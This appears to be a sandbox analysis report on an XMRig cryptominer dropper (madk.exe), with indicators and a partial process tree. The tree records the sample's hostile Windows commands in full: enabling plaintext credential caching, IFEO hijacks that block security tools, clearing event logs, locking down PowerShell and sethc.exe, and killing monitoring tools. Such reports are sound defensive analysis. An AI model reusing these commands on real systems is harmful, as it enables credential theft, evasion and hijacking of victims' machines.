Analysis
max time kernel: 150s
max time network: 145s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 21-06-2022 21:54
Static task: static1
Behavioral task: behavioral1 (sample madk.exe, resource win7-20220414-en)
Behavioral task: behavioral2 (sample madk.exe, resource win10v2004-20220414-en)
General
Target: madk.exe
Size: 3.4MB
MD5: d00af5991807952929e5b986afd295c9
SHA1: 7f5cc8203f2e22bea24bf7f7b2995dc2ef3571ee
SHA256: 025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594
SHA512: c032eec4bbb1a34113ea86606ae3b1c5d94a7f6f7d52d3347341312d4bf3af2dfa730d549b612a37353a21274eae8f10960ad105fc52c4955c33cccf5f0c1cd6
Malware Config
Signatures
Clears Windows event logs 1 TTPs 3 IoCs
Processes: wevtutil.exe (PID 1252), wevtutil.exe (PID 352), wevtutil.exe (PID 3696)
Detected Stratum cryptominer command 2 IoCs
Looks to be attempting to contact a Stratum mining pool.
Processes: rundlls.exe (PID 3076), svchost.exe (PID 740)
XMRig Miner Payload 4 IoCs
YARA rule xmrig matched the following resources:
- behavioral2/memory/2164-189-0x0000000000400000-0x0000000000DEF000-memory.dmp (conhost.exe, PID 2164)
- C:\Windows\Fonts\rundlls.exe
- \??\c:\windows\Fonts\rundlls.exe
- behavioral2/memory/2164-233-0x0000000000400000-0x0000000000DEF000-memory.dmp (conhost.exe, PID 2164)
The dropped conhost.exe (PID 2164) holds the miner image in memory and writes it to disk as c:\windows\Fonts\rundlls.exe (see Drops file in Windows directory); rundlls.exe then runs as PID 3076, the process behind the Stratum detection above. madk.exe also drops c:\windows\Fonts\WinRing0x64.sys, the MSR-access driver that XMRig ships with.
Executes dropped EXE 13 IoCs
Processes: svchost.exe (PIDs 3312, 1548, 2604, 3104, 2020, 1108, 740, 2520, 4324, 1504, 1936), conhost.exe (PID 2164), rundlls.exe (PID 3076)
Sets file execution options in registry 2 TTPs 20 IoCs
Writes Image File Execution Options (IFEO) entries so that launching the named executable runs the configured "debugger" instead; with taskkill.exe as the debugger the target never starts, which blocks the LOLBins ftp.exe, certutil.exe, curl.exe and mshta.exe outright. Two entries (dl1hots.exe and d1lhots.exe) set a value named deebugger; the loader only honours a value named Debugger (case-insensitive), so those two entries are inert. ftp.exe is first pointed at C:\WINDOWS\system32\svchost.exe and then overwritten with taskkill.exe.
Processes: reg.exe (10 instances). Entries under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\:
- HipsDaemon.exe: key created; debugger = "taskkill.exe"
- usysdiag.exe: key created; debugger = "taskkill.exe"
- certutil.exe: key created; debugger = "taskkill.exe"
- curl.exe: key created; debugger = "taskkill.exe"
- mshta.exe: key created; debugger = "taskkill.exe"
- SRDSL.exe: key created; debugger = "taskkill.exe"
- ftp.exe: key created (twice); debugger = "C:\\WINDOWS\\system32\\svchost.exe" (as typed on the command line), then debugger = "taskkill.exe"
- dl1hots.exe: key created; deebugger = "taskkill.exe" (inert, see above)
- d1lhots.exe: key created; deebugger = "taskkill.exe" (inert, see above)
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop the file showing in Explorer etc.
Processes: attrib.exe (PIDs 2016, 4916, 1772, 3296, 2860)
Stops running service(s) 3 TTPs
UPX packed file (YARA rule upx)
Matched resources:
- madk.exe (PID 3744), 0x0000000000400000-0x0000000000809000: behavioral2/memory/3744-130 and 3744-182
- dropped svchost.exe (PIDs 3312, 1548, 2604, 3104, 2020, 1108, 740, 2520, 4324, 1504, 1936), 0x0000000140000000-0x0000000140053000: behavioral2/memory dumps 170, 171, 172, 173, 175, 176, 180, 187, 215, 216, 218, 227, 228, 229, 231, 232, 234
- dropped conhost.exe (PID 2164), 0x0000000000400000-0x0000000000DEF000: behavioral2/memory/2164-189 and 2164-233
- files: C:\Windows\Fonts\svchost.exe (11 hits), \??\c:\windows\Fonts\svchost.exe, C:\Windows\Fonts\conhost.exe, \??\c:\windows\Fonts\conhost.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely a geofence.
Processes: madk.exe queried the key value \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation
Modifies file permissions 1 TTPs 4 IoCs
Processes: takeown.exe (PIDs 4572, 3976, 1044, 4048)
Drops file in Windows directory 64 IoCs
Processes: madk.exe, conhost.exe, attrib.exe (many instances)
- File created \??\c:\windows\Fonts\svchost.exe (madk.exe)
- File created \??\c:\windows\Fonts\WinRing0x64.sys (madk.exe)
- File created \??\c:\windows\Fonts\rundlls.exe (conhost.exe)
- File opened for modification \??\c:\windows\Fonts\rundlls.exe (conhost.exe)
- File opened for modification \??\c:\windows\Fonts\svchost.exe (conhost.exe)
- File opened for modification C:\Windows\lsass.exe (attrib.exe); note the path is C:\Windows, not System32, so this is not the genuine lsass.exe
- File opened for modification C:\Windows\Fonts (attrib.exe, the remaining 58 entries)
Launches sc.exe 23 IoCs
sc.exe is the Windows utility for controlling services on the system.
Processes: sc.exe (PIDs 1332, 5000, 2524, 2248, 2576, 4616, 3216, 4664, 1944, 1964, 4584, 980, 4340, 1140, 1956, 5108, 2516, 308, 4720, 3264, 2136, 1964, 2524; PIDs 1964 and 2524 were each reused for a second sc.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The generic signature text calls this likely ransomware behaviour; nothing else in this run points that way, the payload is an XMRig miner.
Kills process with WMI 4 IoCs
Processes: WMIC.exe (PIDs 4188, 2340, 2300, 2536)
Kills process with taskkill 14 IoCs
Processes: taskkill.exe (PIDs 1744, 4028, 1676, 1748, 3156, 5108, 1196, 4920, 3964, 3880, 3404, 2324, 1340, 4440)
Modifies registry class 1 IoCs
Processes: madk.exe created the key \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings
Modifies registry key 1 TTPs 1 IoCs
The one entry is HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 1 (see the process tree). With this value set, LSASS keeps the plaintext WDigest credentials of logged-on users in memory, which is off by default since Windows 8.1/Server 2012 R2 (and on earlier versions with KB2871997); it is a standard preparation for credential dumping.
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: conhost.exe (PID 2164), 64 occurrences (the cap of the list)
Suspicious behavior: LoadsDriver 1 IoCs
Processes: PID 636 (process name not captured). The only driver file the sample drops is c:\windows\Fonts\WinRing0x64.sys.
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
- taskkill.exe (PIDs 4028, 3404, 3880, 2324, 1676, 1340, 1748, 4440, 1744): SeDebugPrivilege
- rundlls.exe (PID 3076): SeLockMemoryPrivilege (the privilege a miner needs to back its working set with large pages)
- WMIC.exe (PID 2340, the full set twice) and WMIC.exe (PID 2300, cut off by the 64-IoC cap): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36. WMIC enables this whole set at startup whatever the query, so it is not a privilege the sample asked for.
Suspicious use of FindShellTrayWindow 1 IoCs
Processes: rundlls.exe (PID 3076)
Suspicious use of SetWindowsHookEx 4 IoCs
Processes: madk.exe (PID 3744, twice), conhost.exe (PID 2164, twice)
Suspicious use of WriteProcessMemory 64 IoCs
Processes: madk.exe (PID 3744) wrote to the memory of each child it spawned, three writes per child: cmd.exe 4284; reg.exe 4224, 4268, 4184, 4768, 4172; sc.exe 4664, 4720, 3264, 2136, 2524, 2248, 1964, 4584; taskkill.exe 4028, 3404, 3880; net.exe 5084; net1.exe 4088; net.exe 1272; sc.exe 1944; net.exe 3940 (list cut off by the 64-IoC cap). A burst of writes into a just-created child is the usual parent-to-child setup at process creation rather than code injection; the useful information here is the child list itself.
Views/modifies file attributes 1 TTPs 64 IoCs
Processes: attrib.exe, 64 instances (PIDs 1904, 1524, 1588, 3728, 2520, 4648, 4260, 4988, 5084, 1628, 2212, 3992, 1932, 1140, 2348, 908, 656, 4344, 2056, 4292, 412, 1192, 2944, 1744, 4324, 304, 1956, 1772, 784, 2528, 4572, 2016, 4728, 3704, 4372, 1872, 1096, 4596, 4352, 4976, 2528, 3192, 2556, 4592, 2760, 3968, 4048, 3400, 2144, 1640, 3152, 1552, 4916, 3992, 2008, 2944, 2268, 3408, 3700, 4312, 1196, 3152, 4480, 4200; some PIDs were reused)
Processes
Each entry gives the depth in the process tree in brackets, the image path, the command line, and the signatures that fired for that process.
[1] C:\Users\Admin\AppData\Local\Temp\madk.exe
    "C:\Users\Admin\AppData\Local\Temp\madk.exe"
    - Checks computer location settings
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\cmd.exe
      cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
    [3] C:\Windows\SysWOW64\attrib.exe
        attrib -s -h -r -a C:\Windows\Fonts
        - Drops file in Windows directory
  [2] C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
      - Modifies registry key
  [2] C:\Windows\SysWOW64\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
      - Sets file execution options in registry
  [2] C:\Windows\SysWOW64\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
  [2] C:\Windows\SysWOW64\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f
  [2] C:\Windows\SysWOW64\sc.exe
      sc delete MetPipAtcivator
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\sc.exe
      sc stop SetPipAtcivator
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\sc.exe
      sc stop MicrosotMaims
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\sc.exe
      sc delete SetPipAtcivator
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\sc.exe
      sc stop MetPipAtcivator
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\sc.exe
      sc delete MicrosotMaims
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\sc.exe
      sc stop MicrosotMais
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\sc.exe
      sc delete MicrosotMais
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /t /im dl1hots.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /t /im rundlls.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\net1.exe
      net1 user mm123$ /del
  [2] C:\Windows\SysWOW64\net.exe
      net stop mssecsvc2.0
    [3] C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop mssecsvc2.0
  [2] C:\Windows\SysWOW64\net.exe
      net user mm123$ /del
    [3] C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 user mm123$ /del
  [2] C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /t /im d1lhots.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
      - Sets file execution options in registry
  [2] C:\Windows\SysWOW64\sc.exe
      sc delete mssecsvc2.0
      - Launches sc.exe
  [2] C:\Windows\SysWOW64\net.exe
      net stop mssecsvc2.1
    [3] C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop mssecsvc2.1
  [2] C:\Windows\SysWOW64\sc.exe
      sc delete mssecsvc2.1
      - Launches sc.exe
  [2] \??\c:\windows\Fonts\svchost.exe
      c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
      - Executes dropped EXE
  [2] \??\c:\windows\Fonts\svchost.exe
      c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
      - Executes dropped EXE
  [2] \??\c:\windows\Fonts\svchost.exe
      c:\windows\Fonts\svchost.exe start MetPipAtcivator
      - Executes dropped EXE
  [2] \??\c:\windows\Fonts\svchost.exe
      c:\windows\Fonts\svchost.exe start MetPipAtcivator
      - Executes dropped EXE
  [2] C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Windows\TEMP\csonhost.bat
    [3] C:\Windows\SysWOW64\reg.exe
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
    [3] C:\Windows\SysWOW64\PING.EXE
        ping 127.1 -n 5
        - Runs ping.exe
    [3] C:\Windows\SysWOW64\sc.exe
        sc start MetPipAtcivator
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        sc start MetPipAtcivator
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\net.exe
        net share iPC$ /delete
      [4] C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 share iPC$ /delete
    [3] C:\Windows\SysWOW64\net.exe
        net share admin$ /delete
      [4] C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 share admin$ /delete
    [3] C:\Windows\SysWOW64\net.exe
        net share c$ /delete
    [3] C:\Windows\SysWOW64\net.exe
        net share d$ /delete
      [4] C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 share d$ /delete
    [3] C:\Windows\SysWOW64\net.exe
        net share e$ /delete
      [4] C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 share e$ /delete
    [3] C:\Windows\SysWOW64\net.exe
        net share f$ /delete
    [3] C:\Windows\SysWOW64\net.exe
        net stop lanmanserver /y
      [4] C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop lanmanserver /y
    [3] C:\Windows\SysWOW64\sc.exe
        sc config lanmanserver start= DISABLED
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        sc start PolicyAgent
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        sc config PolicyAgent start= AUTO
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        sc stop Graphipcs_PerfSvcs
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        sc delete Graphipcs_PerfSvcs
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate
        - Kills process with WMI
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\attrib.exe
        attrib +s +h +r C:\Windows\svchost.exe
        - Sets file to hidden
    [3] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\svchost.exe /d everyone
    [3] C:\Windows\SysWOW64\sc.exe
        sc stop conhost
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        sc delete conhost
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate
        - Kills process with WMI
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\SysWOW64\conhost.exe /a
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\SysWOW64\conhost.exe /d everyone
    [3] C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f
        - Sets file execution options in registry
    [3] C:\Windows\SysWOW64\sc.exe
        sc start PolicyAgent
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\sc.exe
        sc config PolicyAgent start= AUTO
        - Launches sc.exe
    [3] C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static del all
    [3] C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add policy name=Aliyun
    [3] C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add filterlist name=Allowlist
    [3] C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add filterlist name=denylist
    [3] C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
    [3] C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
    [3] C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
    [3] C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
    [3] C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
    [3] C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add filteraction name=Allow action=permit
    [3] C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add filteraction name=deny action=block
    [3] C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
    [3] C:\Windows\SysWOW64\netsh.exe
        netsh ipsec static set policy name=Aliyun assign=y
    [3] C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /t /im lsars.exe /im lsacs.exe
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /t /im sqlservr.exe
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate
        - Kills process with WMI
    [3] C:\Windows\SysWOW64\attrib.exe
        attrib +s +h +r C:\Windows\Fonts\sqlservr.exe
        - Sets file to hidden
    [3] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\Fonts\sqlservr.exe /d everyone
    [3] C:\Windows\SysWOW64\attrib.exe
        attrib +s +h +r C:\Windows\Fonts\csrss.exe
        - Sets file to hidden
    [3] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
    [3] C:\Windows\SysWOW64\cacls.exe
        cacls C:\Windows\Fonts\csrss.exe /d everyone
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate
        - Kills process with WMI
    [3] C:\Windows\SysWOW64\attrib.exe
        attrib +s +h +r C:\Windows\lsass.exe
        - Sets file to hidden
        - Drops file in Windows directory
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\lsass.exe /d everyone3⤵
-
C:\Windows\SysWOW64\sc.exesc stop "Application Layre Gateway Saervice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "Application Layre Gateway Saervice"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im boy.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\boy.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\boy.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im powershell.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sethc.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im wscript.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "windows powershell"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "security"3⤵
- Clears Windows event logs
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "system"3⤵
- Clears Windows event logs
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\conhost.exe"c:\windows\Fonts\conhost.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im rundll32.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rundll32.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im autoruns.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im autoruns.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im perfmon.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im perfmon.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im ProcessHacker.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ProcessHacker.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im procexp.exe /f /T3⤵
-
